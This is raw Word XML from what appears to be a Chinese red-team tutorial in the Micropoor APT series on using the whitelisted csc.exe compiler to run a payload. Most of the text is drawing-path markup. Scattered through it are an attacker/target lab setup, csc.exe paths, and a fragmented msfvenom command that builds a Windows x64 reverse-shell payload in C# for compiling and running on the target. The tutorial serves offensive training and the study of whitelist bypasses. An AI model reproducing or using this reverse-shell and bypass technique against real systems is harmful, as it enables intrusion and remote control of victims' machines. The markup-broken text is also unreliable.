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group style="position:absolute;margin-left:58.874pt;margin-top:454.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9097;width:82;height:322" coordorigin="1177,9097" coordsize="82,322" path="m1217,9104l1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9105,1217,9105,1217,9105,1217,9105,1217,9105,1217,9106,1217,9106,1217,9106,1217,9107,1217,9107,1217,9107,1217,9108,1217,9108,1217,9109,1217,9109,1217,9110,1217,9111,1217,9111,1217,9112,1217,9113,1217,9113,1217,9114,1217,9115,1217,9116,1217,9117,1217,9118,1217,9119,1217,9120,1217,9121,1217,9122,1217,9123,1217,9125,1217,9126,1217,9127,1217,9129,1217,9130,1217,9132,1217,9133,1217,9135,1217,9137,1217,9138,1217,9140,1217,9142,1217,9144,1217,9146,1217,9148,1217,9150,1217,9153,1217,9155,1217,9157,1217,9160,1217,9162,1217,9165,1217,9167,1217,9170,1217,9173,1217,9176,1217,9179,1217,9182,1217,9185,1217,9188,1217,9191,1217,9195,1217,9198,1217,9202,1217,9205,1217,9209,1217,9213,1217,9217,1217,9221,1217,9225,1217,9229,1217,9233,1217,9238,1217,9242,1217,9247,1217,9252,1217,9256,1217,9261,1217,9266,1217,9271,1217,9276,1217,9282,1217,9287,1217,9293,1217,9298,1217,9304,1217,9310,1217,9316,1217,9322,1217,9328,1217,9334,1217,9341,1217,9347,1217,9354,1217,9361,1217,9367,1217,9374,1217,9382,1217,9389,1217,9396,1217,9404e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:469.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9397" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9397;width:82;height:322" coordorigin="1177,9397" coordsize="82,322" path="m1217,9404l1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9405,1217,9405,1217,9405,1217,9405,1217,9405,1217,9406,1217,9406,1217,9406,1217,9407,1217,9407,1217,9407,1217,9408,1217,9408,1217,9409,1217,9409,1217,9410,1217,9410,1217,9411,1217,9411,1217,9412,1217,9413,1217,9414,1217,9414,1217,9415,1217,9416,1217,9417,1217,9418,1217,9419,1217,9420,1217,9421,1217,9422,1217,9423,1217,9425,1217,9426,1217,9427,1217,9429,1217,9430,1217,9432,1217,9433,1217,9435,1217,9437,1217,9438,1217,9440,1217,9442,1217,9444,1217,9446,1217,9448,1217,9450,1217,9453,1217,9455,1217,9457,1217,9460,1217,9462,1217,9465,1217,9467,1217,9470,1217,9473,1217,9476,1217,9479,1217,9482,1217,9485,1217,9488,1217,9492,1217,9495,1217,9498,1217,9502,1217,9506,1217,9509,1217,9513,1217,9517,1217,9521,1217,9525,1217,9529,1217,9534,1217,9538,1217,9542,1217,9547,1217,9552,1217,9556,1217,9561,1217,9566,1217,9571,1217,9577,1217,9582,1217,9587,1217,9593,1217,9598,1217,9604,1217,9610,1217,9616,1217,9622,1217,9628,1217,9634,1217,9641,1217,9647,1217,9654,1217,9661,1217,9668,1217,9675,1217,9682,1217,9689,1217,9696,1217,9704e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7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0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专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注APT攻击与防御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3783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="5755" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：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请多喝点热水</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或者凉白开，身体特别重要。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Csc.ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e简介：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1253" w:firstLine="483"/>
      </w:pP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C#的在Windows平台下的编译器名称是Csc.exe，如果你的.NET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FrameWork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SDK安</w:t>
      </w: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装在C盘，那么你可以在C:\WINNT\Microsoft.NET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\Framework\xxxxx目录中发现它。为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了使用方便，你可以手动把这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个目录添加到Path环境变量中去。用Csc.exe编译</w:t>
      </w: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HelloWorld.cs非常简单，打开命令提示符，并切换到存放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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test.cs文件的目录中，输入下列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行命令:csc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/target:exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-12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test.cs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-13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将Ttest.cs编译成名为test.exe的console应用程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="221" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1778" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：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Csc.exe所在路径没有被系统添加PAT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H环境变量中，因此，csc命令无法识别。</w:t>
      </w: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基于白名单C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sc.exe配置payload：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows\Microsoft.NET\Fram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ework\v2.0.50727\csc.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="270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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t> 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Debian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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="7131" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>  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192.168.1.5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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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7</w:t>
      </w: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配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置攻击机msf：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74.500pt;margin-top:388.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7770" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:7770;width:8990;height:690" coordorigin="1490,7770" coordsize="8990,690" path="m1510,7798l1510,7798,1510,7798,1510,7798,1510,7798,1510,7798,1510,7798,1511,7798,1512,7798,1512,7798,1514,7798,1515,7798,1517,7798,1519,7798,1521,7798,1524,7798,1528,7798,1532,7798,1536,7798,1541,7798,1546,7798,1552,7798,1559,7798,1566,7798,1575,7798,1583,7798,1593,7798,1603,7798,1615,7798,1627,7798,1640,7798,1654,7798,1668,7798,1684,7798,1701,7798,1719,7798,1738,7798,1758,7798,1780,7798,1802,7798,1826,7798,1851,7798,1877,7798,1904,7798,1933,7798,1963,7798,1995,7798,2028,7798,2063,7798,2099,7798,2136,7798,2175,7798,2216,7798,2259,7798,2303,7798,2348,7798,2396,7798,2445,7798,2496,7798,2549,7798,2604,7798,2660,7798,2719,7798,2779,7798,2841,7798,2906,7798,2972,7798,3041,7798,3112,7798,3184,7798,3259,7798,3336,7798,3416,7798,3498,7798,3582,7798,3668,7798,3757,7798,3848,7798,3941,7798,4037,7798,4136,7798,4236,7798,4340,7798,4446,7798,4555,7798,4666,7798,4780,7798,4897,7798,5017,7798,5139,7798,5264,7798,5392,7798,5523,7798,5657,7798,5793,7798,5933,7798,6076,7798,6222,7798,6370,7798,6522,7798,6677,7798,6835,7798,6997,7798,7161,7798,7329,7798,7500,7798,7675,7798,7853,7798,8034,7798,8219,7798,8407,7798,8598,7798,8793,7798,8992,7798,9194,7798,9400,7798,9609,7798,9823,7798,10039,7798,10260,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7798,10484,7799,10484,7799,10484,7799,10484,7799,10484,7800,10484,7800,10484,7800,10484,7801,10484,7801,10484,7802,10484,7802,10484,7803,10484,7803,10484,7804,10484,7805,10484,7806,10484,7807,10484,7808,10484,7809,10484,7810,10484,7811,10484,7812,10484,7814,10484,7815,10484,7817,10484,7818,10484,7820,10484,7822,10484,7824,10484,7826,10484,7828,10484,7830,10484,7832,10484,7834,10484,7837,10484,7840,10484,7842,10484,7845,10484,7848,10484,7851,10484,7854,10484,7858,10484,7861,10484,7865,10484,7868,10484,7872,10484,7876,10484,7880,10484,7884,10484,7889,10484,7893,10484,7898,10484,7903,10484,7908,10484,7913,10484,7918,10484,7924,10484,7930,10484,7935,10484,7941,10484,7948,10484,7954,10484,7960,10484,7967,10484,7974,10484,7981,10484,7988,10484,7996,10484,8003,10484,8011,10484,8019,10484,8027,10484,8035,10484,8044,10484,8053,10484,8062,10484,8071,10484,8080,10484,8090,10484,8100,10484,8110,10484,8120,10484,8131,10484,8142,10484,8152,10484,8164,10484,8175,10484,8187,10484,8199,10484,8211,10484,8223,10484,8236,10484,8249,10484,8262,10484,8275,10484,8289,10484,8303,10484,8317,10484,8331,10484,8346,10484,8361,10484,8376,10484,8392,10484,8407,10484,8423,10484,8440,10484,8456,10484,8473,10484,8473,10484,8473,10484,8473,10484,8473,10484,8473,10484,8473,10483,8473,10482,8473,10482,8473,10480,8473,10479,8473,10477,8473,10475,8473,10473,8473,10470,8473,10466,8473,10462,8473,10458,8473,10453,8473,10448,8473,10442,8473,10435,8473,10428,8473,10419,8473,10411,8473,10401,8473,10391,8473,10379,8473,10367,8473,10354,8473,10340,8473,10326,8473,10310,8473,10293,8473,10275,8473,10256,8473,10236,8473,10215,8473,10192,8473,10168,8473,10143,8473,10117,8473,10090,8473,10061,8473,10031,8473,9999,8473,9966,8473,9931,8473,9895,8473,9858,8473,9819,8473,9778,8473,9735,8473,9691,8473,9646,8473,9598,8473,9549,8473,9498,8473,9445,8473,9391,8473,9334,8473,9275,8473,9215,8473,9153,8473,9088,8473,9022,8473,8953,8473,8883,8473,8810,8473,8735,8473,8658,8473,8578,8473,8497,8473,8413,8473,8326,8473,8238,8473,8146,8473,8053,8473,7957,8473,7859,8473,7758,8473,7654,8473,7548,8473,7439,8473,7328,8473,7214,8473,7097,8473,6977,8473,6855,8473,6730,8473,6602,8473,6471,8473,6337,8473,6201,8473,6061,8473,5918,8473,5773,8473,5624,8473,5472,8473,5317,8473,5159,8473,4997,8473,4833,8473,4665,8473,4494,8473,4319,8473,4141,8473,3960,8473,3776,8473,3587,8473,3396,8473,3201,8473,3002,8473,2800,8473,2594,8473,2385,8473,2172,8473,1955,8473,1734,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8473,1510,8472,1510,8472,1510,8472,1510,8472,1510,8471,1510,8471,1510,8471,1510,8470,1510,8470,1510,8469,1510,8468,1510,8468,1510,8467,1510,8466,1510,8465,1510,8464,1510,8463,1510,8462,1510,8461,1510,8460,1510,8459,1510,8458,1510,8456,1510,8455,1510,8453,1510,8451,1510,8449,1510,8448,1510,8446,1510,8444,1510,8441,1510,8439,1510,8437,1510,8434,1510,8432,1510,8429,1510,8426,1510,8423,1510,8420,1510,8417,1510,8414,1510,8410,1510,8407,1510,8403,1510,8399,1510,8395,1510,8391,1510,8387,1510,8382,1510,8378,1510,8373,1510,8368,1510,8363,1510,8358,1510,8353,1510,8347,1510,8342,1510,8336,1510,8330,1510,8324,1510,8317,1510,8311,1510,8304,1510,8297,1510,8290,1510,8283,1510,8276,1510,8268,1510,8260,1510,8252,1510,8244,1510,8236,1510,8227,1510,8218,1510,8209,1510,8200,1510,8191,1510,8181,1510,8171,1510,8161,1510,8151,1510,8140,1510,8130,1510,8119,1510,8108,1510,8096,1510,8084,1510,8073,1510,8060,1510,8048,1510,8035,1510,8022,1510,8009,1510,7996,1510,7982,1510,7968,1510,7954,1510,7940,1510,7925,1510,7910,1510,7895,1510,7880,1510,7864,1510,7848,1510,7831,1510,7815,1510,7798e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:388.800pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:279.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8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2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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配置payl</w:t>
      </w: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oad：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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msfvenom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‐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p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windows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x64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shell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reverse_tcp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LHOST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=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pacing w:val="7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.4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LPORT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=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53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‐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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>csharp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397.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:506.400pt;width:467.400pt;height:198.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10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58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copy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buf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到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Micropoor_Csc.cs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shellcode中。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4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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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74.500pt;margin-top:49.500pt;width:449.500pt;height:47.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,950">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:950" coordorigin="1490,990" coordsize="8990,950" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1018,10484,1020,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1033,10484,1035,10484,1038,10484,1041,10484,1044,10484,1047,10484,1051,10484,1054,10484,1058,10484,1062,10484,1066,10484,1070,10484,1074,10484,1078,10484,1083,10484,1088,10484,1093,10484,1098,10484,1103,10484,1109,10484,1115,10484,1121,10484,1127,10484,1133,10484,1140,10484,1147,10484,1154,10484,1161,10484,1168,10484,1176,10484,1184,10484,1192,10484,1200,10484,1209,10484,1218,10484,1227,10484,1236,10484,1246,10484,1256,10484,1266,10484,1276,10484,1287,10484,1298,10484,1309,10484,1320,10484,1332,10484,1344,10484,1356,10484,1369,10484,1382,10484,1395,10484,1409,10484,1422,10484,1436,10484,1451,10484,1466,10484,1481,10484,1496,10484,1512,10484,1528,10484,1544,10484,1561,10484,1578,10484,1595,10484,1613,10484,1631,10484,1649,10484,1668,10484,1687,10484,1706,10484,1726,10484,1746,10484,1767,10484,1788,10484,1809,10484,1831,10484,1853,10484,1875,10484,1898,10484,1921,10484,1945,10484,1945,10484,1945,10484,1945,10484,1945,10484,1945,10484,1945,10483,1945,10482,1945,10482,1945,10480,1945,10479,1945,10477,1945,10475,1945,10473,1945,10470,1945,10466,1945,10462,1945,10458,1945,10453,1945,10448,1945,10442,1945,10435,1945,10428,1945,10419,1945,10411,1945,10401,1945,10391,1945,10379,1945,10367,1945,10354,1945,10340,1945,10326,1945,10310,1945,10293,1945,10275,1945,10256,1945,10236,1945,10215,1945,10192,1945,10168,1945,10143,1945,10117,1945,10090,1945,10061,1945,10031,1945,9999,1945,9966,1945,9931,1945,9895,1945,9858,1945,9819,1945,9778,1945,9735,1945,9691,1945,9646,1945,9598,1945,9549,1945,9498,1945,9445,1945,9391,1945,9334,1945,9275,1945,9215,1945,9153,1945,9088,1945,9022,1945,8953,1945,8883,1945,8810,1945,8735,1945,8658,1945,8578,1945,8497,1945,8413,1945,8326,1945,8238,1945,8146,1945,8053,1945,7957,1945,7859,1945,7758,1945,7654,1945,7548,1945,7439,1945,7328,1945,7214,1945,7097,1945,6977,1945,6855,1945,6730,1945,6602,1945,6471,1945,6337,1945,6201,1945,6061,1945,5918,1945,5773,1945,5624,1945,5472,1945,5317,1945,5159,1945,4997,1945,4833,1945,4665,1945,4494,1945,4319,1945,4141,1945,3960,1945,3776,1945,3587,1945,3396,1945,3201,1945,3002,1945,2800,1945,2594,1945,2385,1945,2172,1945,1955,1945,1734,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1945,1510,1944,1510,1944,1510,1944,1510,1944,1510,1943,1510,1943,1510,1943,1510,1942,1510,1942,1510,1941,1510,1940,1510,1940,1510,1939,1510,1938,1510,1937,1510,1936,1510,1935,1510,1934,1510,1933,1510,1931,1510,1930,1510,1928,1510,1927,1510,1925,1510,1923,1510,1921,1510,1919,1510,1917,1510,1914,1510,1912,1510,1909,1510,1906,1510,1903,1510,1900,1510,1897,1510,1894,1510,1890,1510,1887,1510,1883,1510,1879,1510,1875,1510,1871,1510,1866,1510,1861,1510,1857,1510,1852,1510,1846,1510,1841,1510,1836,1510,1830,1510,1824,1510,1818,1510,1811,1510,1805,1510,1798,1510,1791,1510,1784,1510,1776,1510,1769,1510,1761,1510,1753,1510,1744,1510,1736,1510,1727,1510,1718,1510,1708,1510,1699,1510,1689,1510,1679,1510,1668,1510,1658,1510,1647,1510,1636,1510,1624,1510,1612,1510,1600,1510,1588,1510,1576,1510,1563,1510,1549,1510,1536,1510,1522,1510,1508,1510,1494,1510,1479,1510,1464,1510,1449,1510,1433,1510,1417,1510,1401,1510,1384,1510,1367,1510,1350,1510,1332,1510,1314,1510,1295,1510,1277,1510,1258,1510,1238,1510,1218,1510,1198,1510,1178,1510,1157,1510,1135,1510,1114,1510,1092,1510,1069,1510,1046,1510,1023,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:48.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:117.500pt;width:0.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,2350" coordsize="10,670">
        <v:shape style="position:absolute;left:10390;top:2350;width:10;height:670" coordorigin="10390,2350" coordsize="10,670" path="m10402,2365l10402,2365,10402,2365,10402,2365,10402,2365,10402,2365,10402,2365,10402,2365,10402,2365,10402,2365,10402,2365,10402,2366,10402,2366,10402,2366,10402,2366,10402,2366,10402,2367,10402,2367,10402,2367,10402,2367,10402,2368,10402,2368,10402,2369,10402,2369,10402,2370,10402,2371,10402,2371,10402,2372,10402,2373,10402,2374,10402,2375,10402,2376,10402,2377,10402,2378,10402,2379,10402,2381,10402,2382,10402,2383,10402,2385,10402,2387,10402,2388,10402,2390,10402,2392,10402,2394,10402,2396,10402,2399,10402,2401,10402,2403,10402,2406,10402,2409,10402,2411,10402,2414,10402,2417,10402,2420,10402,2424,10402,2427,10402,2430,10402,2434,10402,2438,10402,2442,10402,2446,10402,2450,10402,2454,10402,2459,10402,2463,10402,2468,10402,2473,10402,2478,10402,2483,10402,2488,10402,2494,10402,2500,10402,2505,10402,2511,10402,2518,10402,2524,10402,2531,10402,2537,10402,2544,10402,2551,10402,2558,10402,2566,10402,2573,10402,2581,10402,2589,10402,2597,10402,2606,10402,2614,10402,2623,10402,2632,10402,2641,10402,2651,10402,2660,10402,2670,10402,2680,10402,2691,10402,2701,10402,2712,10402,2723,10402,2734,10402,2745,10402,2757,10402,2769,10402,2781,10402,2793,10402,2806,10402,2819,10402,2832,10402,2845,10402,2859,10402,2873,10402,2887,10402,2901,10402,2916,10402,2931,10402,2946,10402,2961,10402,2977,10402,2993,10402,3009,10402,3026e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
